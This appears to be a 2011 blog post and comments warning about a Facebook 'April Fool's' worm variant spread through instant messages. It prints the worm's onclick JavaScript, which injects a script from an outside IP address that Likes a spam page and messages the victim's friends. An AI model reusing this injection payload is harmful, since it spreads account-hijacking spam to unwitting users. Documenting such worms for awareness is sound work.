There’s a new variant of the Facebook April Fool’s worm going around. This one appears as an IM with the text “haha! hilarous http://fb.me/TzCxMrJW”; the page behind the URL shortener is http://apps.facebook.com/bullydown/ (taken down since I started writing this, see screenshot) which appears to be a Facebook video but actually loads some JavaScript using an onclick handler:
javascript:if(window.opener){ window.opener.document.body.appendChild(document.createElement(‘script’)).src=’http://173.231.144.82/fb.js?like_link=http://winterweddingfavor.info/bullypal/&app_link=http://fb.me/TzCxMrJW&embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&im_text=haha! hilarous’; window.close(); }else{ document.body.appendChild(document.createElement(‘script’)).src=’http://173.231.144.82/fb.js?like_link=http://winterweddingfavor.info/bullypal/&app_link=http://fb.me/TzCxMrJW&embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&im_text=haha! hilarous’; }
Whatever it loads seems to Facebook Like the link http://winterweddingfavor.info/bullypal/ and then IM your friends. I got three messages in a short span of time. Not sure what’s required to send IMs through Facebook, might be it uses a fake login page to steal credentials like other variants.
April 6, 2011 at 10:55 pm
One of my contacts who was compromised by this says that it didn’t ask for his Facebook credentials, so the mechanism by which it sends IMs must not need them.
October 5, 2011 at 2:23 pm
HOW CAN WE REMOVE THIS.. IT’S IN MY “OTHER PAGES YOU LIKE” AND IT CAN’T BE REMOVE